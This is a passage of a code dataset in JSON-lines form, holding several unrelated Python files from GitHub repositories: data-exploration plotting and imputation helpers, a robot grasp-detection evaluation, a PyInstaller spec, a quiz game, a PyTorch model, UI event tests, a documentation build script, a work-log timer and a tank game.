4)\n .stack()\n .reset_index(name=\"corr\")\n .rename(columns={\"level_0\": \"variable_1\", \"level_1\": \"variable_2\"})\n )\n\n # plot base plot\n corr_plot = (\n alt.Chart(corr_df, title=\"Correlations between variables\")\n .mark_rect()\n .encode(\n x=alt.X(\"variable_1\", title=\"\"),\n y=alt.Y(\"variable_2\", title=\"\"),\n color=alt.Color(\n \"corr\", scale=alt.Scale(scheme=colour_palette, domain=(-1, 1))\n ),\n )\n .properties(height=400, width=400)\n )\n\n # plot corr values\n text = corr_plot.mark_text().encode(\n text=\"corr:Q\",\n color=alt.value(\"black\"))\n\n return corr_plot + text\n\n\ndef divide_and_fill(\n dataframe,\n cols=None,\n missing_values=np.nan,\n strategy=\"mean\",\n fill_value=None,\n random=False,\n parts=1,\n verbose=0,\n):\n \"\"\"Takes a dataframe, subsets selected columns and divides into parts for\n imputation of missing values and returns a data frame.\n\n Parameters\n -----------\n dataframe: pd.DataFrame\n Dataframe from which to take columns and check for missing values.\n cols: list, optional\n List of columns to perform imputation on.\n By default, None (perform on all numeric columns).\n missing_values: int, float, str, np.nan or None\n The placeholder for the missing values.\n All occurences of missing values will be imputed.\n strategy : string, optional\n imputation strategy, one of:\n {'mean', 'median', 'constant', 'most_frequent'}. By default, 'mean'.\n fill_value : string or numerical value, optional\n When strategy == 'constant', fill_value is used to replace all\n occurences of missing_values. 
If left to default, fill_value will be 0\n when filling numerical data and 'missing' for strings or\n object data types.\n random : boolean, optional\n When random == True, shuffles data frame before filling.\n By default, False.\n parts : integer, optional\n The number of parts to divide rows of data frame into. By default, 1.\n verbose : integer, optional\n Controls the verbosity of the divide and fill. By default, 0.\n\n\n Returns\n -------\n dataframe : pandas.DataFrame object\n Data frame obtained after divide and fill on the corresponding columns.\n\n Examples\n -------\n >>> import numpy as np\n >>> from instaeda import divide_and_fill\n >>> example_df = pd.DataFrame({'animal': ['falcon',\n 'dog',\n 'spider',\n 'fish'],\n 'num_legs': [2, 4, 8, np.nan],\n 'num_wings': [2, np.nan, 0, 0],\n 'num_specimen_seen': [10, 2, 6, np.nan]})\n >>> divide_and_fill(example_df)\n \"\"\"\n filled_df = None\n allowed_strategies = [\"mean\", \"median\", \"constant\", \"most_frequent\"]\n\n # Checking inputs\n if verbose:\n print(\"Checking inputs\")\n\n if not isinstance(dataframe, pd.DataFrame):\n raise Exception(\"The input data must be of type pandas.DataFrame!\")\n\n if cols is None:\n cols = list(dataframe.select_dtypes(include=\"number\").columns)\n\n if (\n not isinstance(cols, list)\n or not all(isinstance(x, str) for x in cols)\n or not set(cols).issubset(set(dataframe.columns))\n ):\n raise Exception('''\n The input cols must be a list of strings belong to the column\n names for input dataframe!\n ''')\n\n if (\n not isinstance(missing_values, int)\n and not isinstance(missing_values, float)\n and not isinstance(missing_values, str)\n and (missing_values is not None)\n ):\n raise Exception('''\n The input missing values must be one of the following:\n (int, float, str, np.nan, None)\n ''')\n\n if strategy not in allowed_strategies:\n raise ValueError(\n \"Can only use these strategies: {0} got strategy = {1}\".format(\n allowed_strategies, strategy\n )\n )\n\n if (\n (fill_value is not None)\n and not isinstance(fill_value, int)\n and not isinstance(fill_value, float)\n and not isinstance(fill_value, str)\n ):\n raise Exception('''\n The input fill values must be one of the following:\n (int, float, str, None)\n ''')\n\n if not isinstance(random, bool):\n raise Exception(\"The input random must be True or False\")\n\n if not isinstance(parts, int) or (parts < 1):\n raise ValueError(\"Can only use positive integer parts.\")\n\n if not isinstance(verbose, int):\n raise ValueError(\"Can only use integer for verbose.\")\n\n # Constructing filled dataframe skeleton.\n if verbose:\n print(\"Constructing filled dataframe skeleton.\")\n\n if random:\n filled_df = dataframe.copy().sample(frac=1).reset_index(drop=True)\n else:\n filled_df = dataframe.copy()\n\n if (set(cols) <= set(dataframe.select_dtypes(include=\"number\").columns)):\n if isinstance(fill_value, str):\n raise ValueError('''\n For numeric columns,\n can only use fill values: (int, float, None)\n ''')\n elif (set(cols) <= set(dataframe.select_dtypes(exclude=\"number\").columns)):\n if isinstance(fill_value, int) or isinstance(fill_value, float):\n raise ValueError('''\n For non-numeric columns,\n can only use fill values: (None, str)\n ''')\n else:\n raise Exception('''\n All items in list cols must be numeric, or non-numeric.\n ''')\n\n # Filling data frame\n spacing = filled_df.shape[0]/(parts + 1)\n index = np.arange(0, filled_df.shape[0] + spacing, spacing, dtype=int)\n for i in range(len(index) - 1):\n imputer = SimpleImputer(\n 
missing_values=missing_values,\n strategy=strategy,\n fill_value=fill_value\n )\n filled_df.loc[index[i]: index[i + 1], cols] = imputer.fit_transform(\n filled_df.loc[index[i]: index[i + 1], cols]\n )\n\n if verbose:\n print(\"Returning data frame.\")\n return filled_df\n\n\ndef plot_basic_distributions(\n df,\n cols=None,\n include=None,\n vega_theme=\"ggplot2\"\n):\n \"\"\"Takes a dataframe and generates plots based on types\n\n Parameters\n -----------\n df: pd.DataFrame\n Dataframe from which to generate plots for each column from\n cols: list, optional\n List of columns to generate plots for.\n By default, None (builds charts for all columns).\n include: string, optional\n Select the data types to include. Supported values include None,\n \"string\" and \"number\".\n By default, None - it will return both string and number columns.\n vega_theme : string, optional\n Select the vega.themes for the altair plots.\n The options include: excel, ggplot2,\n quartz, vox, fivethirtyeight, dark, latimes, urbaninstitute,\n and googlecharts. By default, it uses ggplot2.\n\n Returns\n -------\n dict_plots: dict of altair.Chart objects using the column name as the key\n dictionary of generated altair.\n Chart objects with the column name as the key\n\n Examples\n -------\n >>> example_df = pd.DataFrame({'animal': ['falcon',\n 'dog',\n 'spider',\n 'fish'],\n 'num_legs': [2, 4, 8, 0],\n 'num_wings': [2, 0, 0, 0],\n 'num_specimen_seen': [10, 2, 1, 8]})\n >>> instaeda_py.plot_distribution(example_df)\n \"\"\"\n if not isinstance(df, pd.DataFrame):\n raise TypeError(\"The df parameter must be a pandas dataframe\")\n\n if vega_theme not in (\n \"excel\",\n \"ggplot2\",\n \"quartz\",\n \"vox\",\n \"fivethirtyeight\",\n \"dark\",\n \"latimes\",\n \"urbaninstitute\",\n \"googlecharts\",\n ):\n warnings.warn('''\n You have selected a theme that is not one of\n the default Vega color themes.\n ''')\n # Set vega theme\n alt.renderers.enable(embed_options={\"theme\": vega_theme})\n\n dict_plots = {}\n df_data = None\n\n # First filter: select columns\n if cols is None:\n df_data = df\n else:\n df_data = df[cols]\n\n if include not in (None, \"number\", \"string\"):\n raise KeyError(\"\"\"\n The include parameter must be None, 'number' or 'string'\n \"\"\")\n\n # Second filter: select types to include\n if include == \"number\" or include is None:\n\n df_data_number = df_data.select_dtypes(include=\"number\")\n for col in df_data_number.columns.tolist():\n dict_plots[col] = (\n alt.Chart(df_data_number)\n .mark_bar()\n .encode(alt.X(col, bin=alt.Bin(maxbins=50)), y=\"count()\")\n )\n\n if include == \"string\" or include is None:\n\n df_data_string = df_data.select_dtypes(include=\"object\")\n for col in df_data_string.columns.tolist():\n dict_plots[col] = (\n alt.Chart(df_data_string)\n .mark_bar()\n .encode(x=alt.X(\"count()\"), y=alt.Y(col, sort=\"-x\"))\n )\n\n if len(dict_plots) == 0:\n warnings.warn(\n \"\"\"\n Zero plots were generated.\n Please ensure you specifiy the correct parameters for cols and include\n \"\"\")\n\n return dict_plots\n","repo_name":"UBC-MDS/instaeda_py","sub_path":"instaeda/instaeda.py","file_name":"instaeda.py","file_ext":"py","file_size_in_byte":16170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70162922077","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\n\nfrom dataset_processing.grasp import GraspRectangles, detect_grasps, GraspRectangle, Grasps2GraspRectangles\n\n\ndef 
plot_output(rgb_img, depth_img, test_pred, no_grasps=1):\n    \"\"\"\n    Plot the output of a GG-CNN\n    :param rgb_img: RGB Image\n    :param depth_img: Depth Image\n    :param grasp_q_img: Q output of GG-CNN\n    :param grasp_angle_img: Angle output of GG-CNN\n    :param no_grasps: Maximum number of grasps to plot\n    :param grasp_width_img: (optional) Width output of GG-CNN\n    :return:\n    \"\"\"\n    # gs = detect_grasps(grasp_q_img, grasp_angle_img, width_img=grasp_width_img, no_grasps=no_grasps)\n    gs = Grasps2GraspRectangles(test_pred)\n\n    fig = plt.figure(figsize=(10, 10))\n    ax = fig.add_subplot(2, 2, 1)\n    ax.imshow(rgb_img)\n    # for g in gs:\n    #     g.plot(ax)\n    gs.plot(ax)\n    ax.set_title('RGB')\n    ax.axis('off')\n\n    ax = fig.add_subplot(2, 2, 2)\n    ax.imshow(depth_img, cmap='gray')\n    # for g in gs:\n    #     g.plot(ax)\n    gs.plot(ax)\n    ax.set_title('Depth')\n    ax.axis('off')\n\n    # ax = fig.add_subplot(2, 2, 3)\n    # plot = ax.imshow(grasp_q_img, cmap='jet', vmin=0, vmax=1)\n    # ax.set_title('Q')\n    # ax.axis('off')\n    # plt.colorbar(plot)\n\n    # ax = fig.add_subplot(2, 2, 4)\n    # plot = ax.imshow(grasp_angle_img, cmap='hsv', vmin=-np.pi / 2, vmax=np.pi / 2)\n    # ax.set_title('Angle')\n    # ax.axis('off')\n    # plt.colorbar(plot)\n    \n    plt.show()\n\n\ndef calculate_iou_match(val_pred, ground_truth_bbs, no_grasps=1, grasp_width=None):\n    \"\"\"\n    Calculate grasp success using the IoU (Jacquard) metric (e.g. in https://arxiv.org/abs/1301.3592) #center, angle, \n    A success is counted if grasp rectangle has a 25% IoU with a ground truth, and is withing 30 degrees.\n    :param grasp_q: Q outputs of GG-CNN (Nx300x300x3)\n    :param grasp_angle: Angle outputs of GG-CNN\n    :param ground_truth_bbs: Corresponding ground-truth BoundingBoxes\n    :param no_grasps: Maximum number of grasps to consider per image.\n    :param grasp_width: (optional) Width output from GG-CNN\n    :return: success\n    \"\"\"\n\n    # if not isinstance(ground_truth_bbs, GraspRectangles):\n    #     gt_bbs = GraspRectangles.load_from_array(ground_truth_bbs) #读入bbx的四个角的坐标\n    # else:\n    #     gt_bbs = ground_truth_bbs\n    # gs = detect_grasps(grasp_q, grasp_angle, width_img=grasp_width, no_grasps=no_grasps)\n\n    gs = Grasps2GraspRectangles(val_pred)\n    # print('gs:')\n    # print(gs)\n    # print(type(gs))\n    # print(type(val_pred))\n    gt_bbs = [ground_truth_bb.cpu() for ground_truth_bb in ground_truth_bbs]\n    # print(gt_bbs)\n    # print(type(gt_bbs))\n    # print(gt_bbs[0])\n    # print(gt_bbs[0][0])\n\n    # gt_bbs = np.array(gt_bbs)\n    # gs = np.array(gs)\n\n    # gt_bbs = torch.from_numpy(gt_bbs)\n    # gs = torch.from_numpy(gs)\n\n    if gs.max_iou(gt_bbs) > 0.25:\n        return True\n    else:\n        return False","repo_name":"HZWang96/robot-grasp-detection","sub_path":"dataset_processing/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"}
{"seq_id":"8447101634","text":"# -*- mode: python ; coding: utf-8 -*-\n\n\nblock_cipher = None\n\n\na = Analysis(\n    [\"DP100_main.py\", \"DP100_gui.py\", \"DP100API.py\"],\n    pathex=[],\n    binaries=[],\n    datas=[\n        (\".\\\\ATK-DP100DLL(x64).dll\", \".\"),\n        (\".\\\\ATK-DP100DLL(x86).dll\", \".\"),\n        (\".\\\\icon.ico\", \".\"),\n    ],\n    hiddenimports=[\"pyi_splash\"],\n    hookspath=[],\n    hooksconfig={},\n    runtime_hooks=[],\n    excludes=[\n        \"llvm\",\n        \"matplotlib\",\n        \"wx\",\n        \"scipy\",\n        \"PIL\",\n        \"llvmlite\",\n        \"numba\",\n    ],  #\n    win_no_prefer_redirects=False,\n    win_private_assemblies=False,\n    cipher=block_cipher,\n    noarchive=True,\n)\nsplash = Splash(\n    \"booting.png\",\n    binaries=a.binaries,\n    datas=a.datas,\n    text_pos=(110, 468),\n    text_size=12,\n    text_color=\"#daff6e\",\n    max_img_size=(760, 480),\n    always_on_top=False,\n)\npyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)\nexe = EXE(\n    pyz,\n    a.scripts,\n    a.binaries,\n    a.zipfiles,\n    a.datas,\n    splash,  # <-- both, splash target\n    splash.binaries,  # <-- and splash binaries\n    [],\n    name=\"DP100GUI\",\n    debug=False,\n    bootloader_ignore_signals=False,\n    strip=False,\n    upx=False,\n    upx_exclude=[],\n    runtime_tmpdir=None,\n    console=False,\n    disable_windowed_traceback=False,\n    argv_emulation=False,\n    target_arch=None,\n    codesign_identity=None,\n    entitlements_file=None,\n    icon=\"icon.ico\",\n)\n# coll = COLLECT(\n#     exe,\n#     a.binaries,\n#     a.zipfiles,\n#     a.datas,\n#     strip=False,\n#     upx=False,\n#     upx_exclude=[],\n#     name=\"DP100GUI\",\n# )\n","repo_name":"ElluIFX/DP100","sub_path":"DP100GUI.spec","file_name":"DP100GUI.spec","file_ext":"spec","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"4868756003","text":"from data import question_data\nfrom question_model import Question\nfrom quiz_brain import QuizBrain\n\nquestion_bank = []\n\n# Fills question_bank with Question objects produced from questin_data\nfor i in question_data:\n    question_bank.append(Question(i['question'], i['correct_answer']))\n\n# Creates QuizBrain object with Question objects list question_bank\nquiz = QuizBrain(question_bank)\n\n# Starts questions\nquiz.next_question()\n\n# Checks if there are still questions and calls next\nwhile quiz.still_has_questions():\n    quiz.next_question()\n\n# Final message\nprint(f'Finished! Your final Score is {quiz.score}, you answered correctly'\n      f' {round(100 * quiz.score / len(quiz.questions_list))}% of all questions')","repo_name":"gskumlehn/python-bootcamp","sub_path":"2-Object-Oriented-Programming/quiz-game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"33731727047","text":"import json\r\nimport matplotlib.pyplot as plt\r\nimport itertools\r\n\r\nmarker = itertools.cycle(('s', 'o', 'D', '>', '*')) \r\n\r\nsizes = [15, 20, 25, 30, 34]\r\n\r\nfig, ax = plt.subplots()\r\n\r\nfor size in sizes:\r\n    with open(rf\"./results_{size}.json\", 'r') as f:\r\n        results = json.load(f)\r\n\r\n    ax.scatter(results['density'], results['speed'], label=f\"N={size}\", marker=next(marker))\r\nax.set_xlabel(\"density\")\r\nax.set_ylabel(\"speed\")\r\nax.set_title(\"Fundamental diagram for boids on a circular track\\nAlignment=False, Cohesion=False, Separation=False\")\r\nax.legend(title=\"population size\")\r\nfig.tight_layout()\r\nplt.show()","repo_name":"slejeune/swarm-intelligence","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"21717388003","text":"import math\n\nimport torch\nfrom numpy import ndarray\nfrom torch import nn\nimport torch.nn.functional as f\nfrom processors.node_box_processor import NodeBoxProcessor\n\n\nclass CombinerProcessor(NodeBoxProcessor):\n    def __init__(self, weights_file, input_size):\n        self.model = CombinerModel(input_size)\n        if weights_file is not None:\n            self.model.load_state_dict(torch.load(weights_file))\n        self.model.eval()\n\n    def process(self, timestamp, features: ndarray) -> (int, list):\n        \"\"\"Process the data and 
return the result as a tuple of (timestamp, result).\n The timestamp is the timestamp of when the result is predicted for\n\n features: price, ema, rsi, macd, volatility, channels\"\"\"\n return int(timestamp), [self.predict(features).item()]\n\n def predict(self, features: ndarray):\n with torch.no_grad():\n x = torch.tensor(features).type(torch.cuda.FloatTensor)\n return self.model(x)\n\n\nclass CombinerModel(nn.Module):\n def __init__(self, input_size):\n data_type = torch.cuda.FloatTensor\n super().__init__()\n self.fc1 = nn.Linear(input_size, input_size*2).type(data_type)\n self.fc1.weight.data.uniform_(-0.1, 0.1)\n self.fc2 = nn.Linear(input_size*2, math.ceil(input_size*0.5)).type(data_type)\n self.fc2.weight.data.uniform_(-0.1, 0.1)\n self.fc3 = nn.Linear(math.ceil(input_size*0.5), 1).type(data_type)\n self.fc3.weight.data.uniform_(-0.1, 0.1)\n\n def forward(self, x):\n x = f.leaky_relu(self.fc1(x))\n x = f.leaky_relu(self.fc2(x))\n y = f.leaky_relu(self.fc3(x))\n return y\n","repo_name":"Coec0/MachineStock","sub_path":"node-box/processors/combiner_processor.py","file_name":"combiner_processor.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"36253623455","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# app.py (Python)\n# \n# Objetivo: Criar um frame com uma label e um botão no Tkinter.\n# \n# Site: https://dirack.github.io\n# \n# Versão 1.0\n# \n# Programador: Rodolfo A C Neves (Dirack) 05/09/2020\n# \n# Email: rodolfo_profissional@hotmail.com\n# \n# Licença: GPL-3.0 .\n\nfrom Tkinter import *\n\nclass Application:\n\t\n\tdef __init__(self, master=None):\n\t\tself.widget1 = Frame(master)\n\t\tself.widget1.pack()\n\t\tself.msg = Label(self.widget1, text=\"Primeiro widget\")\n\t\tself.msg[\"font\"] = (\"Verdana\", \"10\", \"italic\", \"bold\")\n\t\tself.msg.pack ()\n\t\tself.sair = Button(self.widget1)\n\t\tself.sair[\"text\"] = \"Sair\"\n\t\tself.sair[\"font\"] = (\"Calibri\", \"10\")\n\t\tself.sair[\"width\"] = 5\n\t\tself.sair[\"command\"] = self.widget1.quit\n\t\tself.sair.pack ()\n\nroot = Tk()\nApplication(root)\nroot.mainloop()\n","repo_name":"Dirack/Estudos","sub_path":"Python/Tkinter/basicInterface/widgetWithLabel/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"6280497591","text":"import pytest\n\nimport idom\nfrom idom.core.events import (\n EventHandler,\n merge_event_handler_funcs,\n merge_event_handlers,\n to_event_handler_function,\n)\n\n\ndef test_event_handler_repr():\n handler = EventHandler(lambda: None)\n assert repr(handler) == (\n f\"EventHandler(function={handler.function}, prevent_default=False, \"\n f\"stop_propagation=False, target={handler.target!r})\"\n )\n\n\ndef test_event_handler_props():\n handler_0 = EventHandler(lambda data: None)\n assert handler_0.stop_propagation is False\n assert handler_0.prevent_default is False\n assert handler_0.target is None\n\n handler_1 = EventHandler(lambda data: None, prevent_default=True)\n assert handler_1.stop_propagation is False\n assert handler_1.prevent_default is True\n assert handler_1.target is None\n\n handler_2 = EventHandler(lambda data: None, stop_propagation=True)\n assert handler_2.stop_propagation is True\n assert handler_2.prevent_default is False\n assert handler_2.target is None\n\n handler_3 = EventHandler(lambda data: None, target=\"123\")\n assert 
handler_3.stop_propagation is False\n assert handler_3.prevent_default is False\n assert handler_3.target == \"123\"\n\n\ndef test_event_handler_equivalence():\n async def func(data):\n return None\n\n assert EventHandler(func) == EventHandler(func)\n\n assert EventHandler(lambda data: None) != EventHandler(lambda data: None)\n\n assert EventHandler(func, stop_propagation=True) != EventHandler(\n func, stop_propagation=False\n )\n\n assert EventHandler(func, prevent_default=True) != EventHandler(\n func, prevent_default=False\n )\n\n assert EventHandler(func, target=\"123\") != EventHandler(func, target=\"456\")\n\n\nasync def test_to_event_handler_function():\n call_args = idom.Ref(None)\n\n async def coro(*args):\n call_args.current = args\n\n def func(*args):\n call_args.current = args\n\n await to_event_handler_function(coro, positional_args=True)([1, 2, 3])\n assert call_args.current == (1, 2, 3)\n\n await to_event_handler_function(func, positional_args=True)([1, 2, 3])\n assert call_args.current == (1, 2, 3)\n\n await to_event_handler_function(coro, positional_args=False)([1, 2, 3])\n assert call_args.current == ([1, 2, 3],)\n\n await to_event_handler_function(func, positional_args=False)([1, 2, 3])\n assert call_args.current == ([1, 2, 3],)\n\n\nasync def test_merge_event_handler_empty_list():\n with pytest.raises(ValueError, match=\"No event handlers to merge\"):\n merge_event_handlers([])\n\n\n@pytest.mark.parametrize(\n \"kwargs_1, kwargs_2\",\n [\n ({\"stop_propagation\": True}, {\"stop_propagation\": False}),\n ({\"prevent_default\": True}, {\"prevent_default\": False}),\n ({\"target\": \"this\"}, {\"target\": \"that\"}),\n ],\n)\nasync def test_merge_event_handlers_raises_on_mismatch(kwargs_1, kwargs_2):\n def func(data):\n return None\n\n with pytest.raises(ValueError, match=\"Cannot merge handlers\"):\n merge_event_handlers(\n [\n EventHandler(func, **kwargs_1),\n EventHandler(func, **kwargs_2),\n ]\n )\n\n\nasync def test_merge_event_handlers():\n handler = EventHandler(lambda data: None)\n assert merge_event_handlers([handler]) is handler\n\n calls = []\n merged_handler = merge_event_handlers(\n [\n EventHandler(lambda data: calls.append(\"first\")),\n EventHandler(lambda data: calls.append(\"second\")),\n ]\n )\n await merged_handler.function({})\n assert calls == [\"first\", \"second\"]\n\n\ndef test_merge_event_handler_funcs_empty_list():\n with pytest.raises(ValueError, match=\"No event handler functions to merge\"):\n merge_event_handler_funcs([])\n\n\nasync def test_merge_event_handler_funcs():\n calls = []\n\n async def some_func(data):\n calls.append(\"some_func\")\n\n async def some_other_func(data):\n calls.append(\"some_other_func\")\n\n assert merge_event_handler_funcs([some_func]) is some_func\n\n merged_handler = merge_event_handler_funcs([some_func, some_other_func])\n await merged_handler([])\n assert calls == [\"some_func\", \"some_other_func\"]\n\n\ndef test_can_prevent_event_default_operation(driver, display):\n @idom.component\n def Input():\n @idom.event(prevent_default=True)\n async def on_key_down(value):\n pass\n\n return idom.html.input({\"onKeyDown\": on_key_down, \"id\": \"input\"})\n\n display(Input)\n\n inp = driver.find_element(\"id\", \"input\")\n inp.send_keys(\"hello\")\n # the default action of updating the element's value did not take place\n assert inp.get_attribute(\"value\") == \"\"\n\n\ndef test_simple_click_event(driver, display):\n @idom.component\n def Button():\n clicked, set_clicked = idom.hooks.use_state(False)\n\n async def 
on_click(event):\n set_clicked(True)\n\n if not clicked:\n return idom.html.button({\"onClick\": on_click, \"id\": \"click\"}, [\"Click Me!\"])\n else:\n return idom.html.p({\"id\": \"complete\"}, [\"Complete\"])\n\n display(Button)\n\n button = driver.find_element(\"id\", \"click\")\n button.click()\n driver.find_element(\"id\", \"complete\")\n\n\ndef test_can_stop_event_propogation(driver, driver_wait, display):\n clicked = idom.Ref(False)\n\n @idom.component\n def DivInDiv():\n @idom.event(stop_propagation=True)\n def inner_click_no_op(event):\n clicked.current = True\n\n def outer_click_is_not_triggered(event):\n assert False\n\n outer = idom.html.div(\n {\n \"style\": {\n \"height\": \"35px\",\n \"width\": \"35px\",\n \"backgroundColor\": \"red\",\n },\n \"onClick\": outer_click_is_not_triggered,\n \"id\": \"outer\",\n },\n idom.html.div(\n {\n \"style\": {\n \"height\": \"30px\",\n \"width\": \"30px\",\n \"backgroundColor\": \"blue\",\n },\n \"onClick\": inner_click_no_op,\n \"id\": \"inner\",\n },\n ),\n )\n return outer\n\n display(DivInDiv)\n\n inner = driver.find_element(\"id\", \"inner\")\n inner.click()\n\n driver_wait.until(lambda _: clicked.current)\n","repo_name":"Archmonger/reactpy","sub_path":"tests/test_core/test_events.py","file_name":"test_events.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"31940168099","text":"from pydantic import BaseModel\nimport hashlib\nimport json\nfrom datetime import datetime\nfrom olympia.train import duration, harmony, sequence, ModelSettings\nfrom olympia.data import song\n\n\ndef train_model(song_objs, settings=None, run_duration=False, run_sequence=False, run_harmony=False):\n\n model_settings = None\n if settings:\n model_settings = ModelSettings(**settings)\n\n else:\n model_settings = ModelSettings()\n\n if run_sequence:\n sequence_model = sequence.SequenceModel(song_objs, model_settings)\n sequence_model.train_sequences()\n\n if run_harmony:\n harmony_model = harmony.HarmonyModel(song_objs, model_settings)\n harmony_model.train_harmony()\n\n if run_duration:\n duration_model = duration.DurationModel(song_objs, model_settings)\n duration_model.train_duration()\n\n\nif __name__ == \"__main__\":\n settings = {\"instrument\": \"piano\", \"time_signature\": \"4/4\", \"epochs\": 5000}\n song_objs = song.get_songs(\"piano\", time_signature=\"4/4\", key=None, limit=10)\n train_model(song_objs, run_sequence=True)\n","repo_name":"jacquelinegarrahan/Olympia","sub_path":"olympia/scripts/train_all.py","file_name":"train_all.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"8306879891","text":"#!/usr/bin/env python\n\n\"\"\"\nBuild documentation by compiling README.md, .md, and .rst.\n\nNote:\n This script should NOT be run from source directory, use its link in root directory of this repository\n to build the documentation.\n\"\"\"\n\nimport os\nimport glob\nimport shutil\nimport cmder\n\nCWD = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'doc')\nSOURCE = os.path.join(CWD, 'source')\nCACHE = os.path.join(SOURCE, '.cache')\nPROJECT = os.path.join(SOURCE, 'notes')\nos.makedirs(CACHE, exist_ok=True)\n\n\ndef update_doc():\n \"\"\"\n Update top level doc by replacing placeholder __TOC__ with .md and .rst files list.\n \n :return: a list of top level docs.\n \"\"\"\n \n folders, toc = os.listdir(PROJECT), []\n for folder in folders:\n 
source = os.path.join(PROJECT, folder, 'README.md')\n target = os.path.join(CACHE, folder, f'{folder}.md')\n if os.path.exists(source):\n os.makedirs(os.path.join(CACHE, folder), exist_ok=True)\n toc.append(os.path.join(os.path.basename(CACHE), folder, f'{folder}.md'))\n # os.chdir(PROJECT)\n # files = [file for file in glob.iglob(os.path.join(folder, '*.md')) if not file.endswith('README.md')]\n # files += glob.glob(os.path.join(folder, '*.rst'))\n\n os.chdir(os.path.join(PROJECT, folder))\n files = [file for file in glob.iglob('*.md') if not file.endswith('README.md')]\n files += glob.glob('*.rst')\n \n for file in files:\n shutil.copy(file, os.path.join(CACHE, folder, file))\n\n with open(source) as f, open(target, 'w') as o:\n o.write(f.read().replace('__TOC__', '\\n'.join(files)))\n return toc\n\n\ndef update_master_doc(toc):\n \"\"\"\n Update master doc by replacing placeholder __TOC__ with top level doc list.\n \n :param toc: list, a list of top level docs.\n :return:\n \"\"\"\n \n with open(os.path.join(SOURCE, '.index.template.md')) as f, open(os.path.join(SOURCE, 'index.md'), 'w') as o:\n o.write(f.read().replace('__TOC__', '\\n'.join(sorted(toc))))\n\n\ndef main():\n toc = update_doc()\n update_master_doc(toc)\n cmder.run('rm -r build/html/*', msg='Deleting old build ...', cwd=CWD)\n cmder.run('make html', cwd=CWD, debug=True, msg='Building new docs ...')\n cmder.run('rm -r source/.cache', cwd=CWD, log_cmd=False)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"iBiology/iNotes","sub_path":"doc/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29863442488","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport time\nimport datetime\nimport locale\nimport sys\nimport pathlib\n\nif (sys.argv[1] != \"stop\") and (sys.argv[1] != \"start\" or len(sys.argv) != 4): \n raise Exception('usage: wl start category activity | wl stop')\n\nlocale.setlocale(locale.LC_ALL, 'en_US.utf8')\ndateformat = \"%a %Y-%m-%d %H:%M:%S\"\n\nlogDir = str(pathlib.Path.home()) + \"/.worklog/\"\nlogPath = logDir + \"log.csv\"\nsubprocess.run(\"mkdir -p \" + logDir, shell=True)\nsubprocess.run(\"touch \" + logPath, shell=True)\n\ncurrentTime = datetime.datetime.today()\ncurrentTimeStr = currentTime.strftime(dateformat)\n\nwith open(logPath, 'r+') as logFile:\n lines = logFile.read().splitlines()\n if len(lines) > 0:\n lastLine = lines[-1]\n if lastLine.endswith(\";\"):\n startTime = datetime.datetime.strptime(lastLine.split(\";\")[0], dateformat)\n diffTime = currentTime - startTime\n logFile.write(currentTimeStr + \";\" + str(diffTime) + \"\\n\")\n else:\n print(\"Log file is empty\")\n\n if sys.argv[1] == \"start\":\n toLog = currentTimeStr + \";\" + sys.argv[2] + \";\" + sys.argv[3] + \";\"\n logFile.write(toLog)\n print(\"Writing to log: \" + toLog)\n \nprint(\"\\nTail of log fail\")\nsubprocess.run(\"tail \" + logPath, shell=True)\nprint(\"\\n\")\n","repo_name":"sikor/poligon","sub_path":"wl.py","file_name":"wl.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"40481429197","text":"import random\nclass Tank:\n def __init__(self, name, armor, min_damage, max_damage, hp,):\n self.name = name\n self.armor = armor\n self.min_damage = min_damage\n self.max_damage = max_damage\n self.hp = hp\n\n def run(self):\n print(self.name + \" выдвигается\")\n\n def 
loosehealth(self, damage):\n if self.hp <= 0:\n print(\"{} defeated\".format(self.name))\n else:\n self.hp = self.hp - damage\n print(\"у {} осталось {} HP\".format(self.name, self.hp))\n\n def fire(self, enemy):\n damage = random.randint(self.min_damage, self.max_damage)\n print(\"{} стреляет по {}\".format(self.name, enemy.name))\n enemy.loosehealth(damage)\n\n def __str__(self):\n\n return \"{} имеет броню в {}, урон {}-{}, и {} очков жизни\".format(self.name, self.armor, self.min_damage, self.max_damage, self.hp)\n\nif __name__ == \"__main__\":\n\n tank1 = Tank(\"Hellcat\", 100, 15, 60, 300)\n tank2 = Tank(\"Panther\", 80, 20, 70, 270)\n\n\n tank1.fire(tank2)\n\n for bullet in range(20):\n tank1.fire(tank2)","repo_name":"Artur-808/maximumlessons","sub_path":"lesson_6/lesson6.py","file_name":"lesson6.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42290567179","text":"\"\"\"\nExponential Moving 